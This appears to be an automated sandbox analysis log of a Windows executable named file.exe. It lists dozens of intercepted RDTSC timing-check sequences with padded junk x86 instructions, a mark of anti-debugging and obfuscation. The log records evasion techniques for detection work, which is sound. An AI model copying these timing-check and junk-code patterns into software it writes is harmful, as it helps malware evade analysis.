                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC274A second address: CC276C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F996107E1BEh 0x0000000f js 00007F996107E1B6h 0x00000015 push esi 0x00000016 pop esi 0x00000017 pushad 0x00000018 jno 00007F996107E1B6h 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC57B9 second address: CC57BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC57BF second address: CC57C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC57C5 second address: CC57EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F99607DC0D0h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC57EB second address: CC57F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC57F1 second address: CC5808 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F99607DC0CFh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5808 second address: CC5818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F996107E1BCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5958 second address: CC595E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC595E second address: CC5982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F996107E1B6h 0x0000000a popad 0x0000000b jmp 00007F996107E1C6h 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5982 second address: CC5991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jnp 00007F99607DC0D7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5B1B second address: CC5B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5B1F second address: CC5B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F99607DC0C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5B2B second address: CC5B31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C43C05 second address: C43C17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F99607DC0CCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9735 second address: CC9739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9739 second address: CC9768 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99607DC0C6h 0x00000008 jmp 00007F99607DC0CAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007F99607DC0E0h 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 jmp 00007F99607DC0CAh 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCDD4A second address: CCDD54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F996107E1B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCDD54 second address: CCDD58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD5A6 second address: CCD5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F996107E1B6h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD5B3 second address: CCD5C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0CDh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD710 second address: CCD741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b pushad 0x0000000c jp 00007F996107E1B6h 0x00000012 jmp 00007F996107E1C3h 0x00000017 push edi 0x00000018 pop edi 0x00000019 jbe 00007F996107E1B6h 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD741 second address: CCD747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD9FA second address: CCDA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCDA00 second address: CCDA06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCDA06 second address: CCDA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F996107E1B6h 0x0000000a popad 0x0000000b jmp 00007F996107E1BEh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007F996107E1BCh 0x00000019 jnp 00007F996107E1B6h 0x0000001f jmp 00007F996107E1BCh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCDA3A second address: CCDA56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99607DC0D8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCDA56 second address: CCDA5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3E44 second address: CD3E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3E48 second address: CD3E5E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F996107E1B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F996107E1BAh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3E5E second address: CD3E65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3E65 second address: CD3E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F996107E1B6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3E79 second address: CD3E86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2A9E second address: CD2AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2AA2 second address: CD2AAC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99607DC0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2BD2 second address: CD2BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2BD8 second address: CD2BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jns 00007F99607DC0C8h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2BE5 second address: CD2BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F996107E1B6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2BF1 second address: CD2C23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F99607DC0CAh 0x0000000c jns 00007F99607DC0C6h 0x00000012 pop edx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jo 00007F99607DC0C6h 0x0000001e jmp 00007F99607DC0CFh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2C23 second address: CD2C33 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F996107E1B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2C33 second address: CD2C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2C39 second address: CD2C3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B249 second address: C7B24E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B24E second address: C7B25F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007F996107E1BEh 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B25F second address: C7B2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 nop 0x00000006 or dword ptr [ebp+1247BA0Fh], edi 0x0000000c jg 00007F99607DC0CBh 0x00000012 push 00000004h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F99607DC0C8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e je 00007F99607DC0CAh 0x00000034 mov dx, 2E6Eh 0x00000038 nop 0x00000039 push ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F99607DC0D9h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B2BD second address: C7B2E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F996107E1B6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3070 second address: CD307F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jc 00007F99607DC0CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD307F second address: CD3083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3083 second address: CD3093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0CBh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8181 second address: CD81AA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F996107E1C9h 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F996107E1B6h 0x00000010 js 00007F996107E1B6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD734F second address: CD7387 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F99607DC0C8h 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f jmp 00007F99607DC0D5h 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007F99607DC0CEh 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7387 second address: CD7399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F996107E1BCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7539 second address: CD753F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7B60 second address: CD7B8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F996107E1B8h 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 jno 00007F996107E1B6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF7FA second address: CDF820 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F99607DC0D9h 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF820 second address: CDF829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF829 second address: CDF833 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F99607DC0CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFC84 second address: CDFC89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFC89 second address: CDFCA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F99607DC0C6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c jng 00007F99607DC0C6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F99607DC0C6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFCA6 second address: CDFCAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE02DD second address: CE02EA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99607DC0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE056E second address: CE0572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0572 second address: CE057C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE057C second address: CE0586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F996107E1B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0586 second address: CE0590 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F99607DC0C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0872 second address: CE087E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0B06 second address: CE0B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0B0A second address: CE0B32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1C8h 0x00000007 jbe 00007F996107E1B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE10E5 second address: CE10E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE10E9 second address: CE10F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE10F2 second address: CE1126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F99607DC0C6h 0x0000000a pop edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 jns 00007F99607DC0C6h 0x00000018 jmp 00007F99607DC0CFh 0x0000001d pop eax 0x0000001e popad 0x0000001f pushad 0x00000020 push esi 0x00000021 push edi 0x00000022 pop edi 0x00000023 pushad 0x00000024 popad 0x00000025 pop esi 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1126 second address: CE112A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE112A second address: CE1149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F99607DC0D7h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1149 second address: CE114D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE144B second address: CE144F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE144F second address: CE1460 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1460 second address: CE146A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99607DC0D2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB05E second address: CEB062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB062 second address: CEB07D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F99607DC0CFh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB07D second address: CEB083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB083 second address: CEB087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB1E8 second address: CEB20E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F996107E1B6h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F996107E1C0h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007F996107E1B6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB20E second address: CEB212 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB212 second address: CEB22A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F996107E1B8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB22A second address: CEB230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB230 second address: CEB23C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F996107E1B6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB3BF second address: CEB3D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0CDh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB566 second address: CEB573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jo 00007F996107E1B6h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB573 second address: CEB579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2E38 second address: CF2E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2E44 second address: CF2E4E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F99607DC0C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2E4E second address: CF2E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3158 second address: CF3161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3708 second address: CF370E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF370E second address: CF3712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3712 second address: CF3716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3716 second address: CF371F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
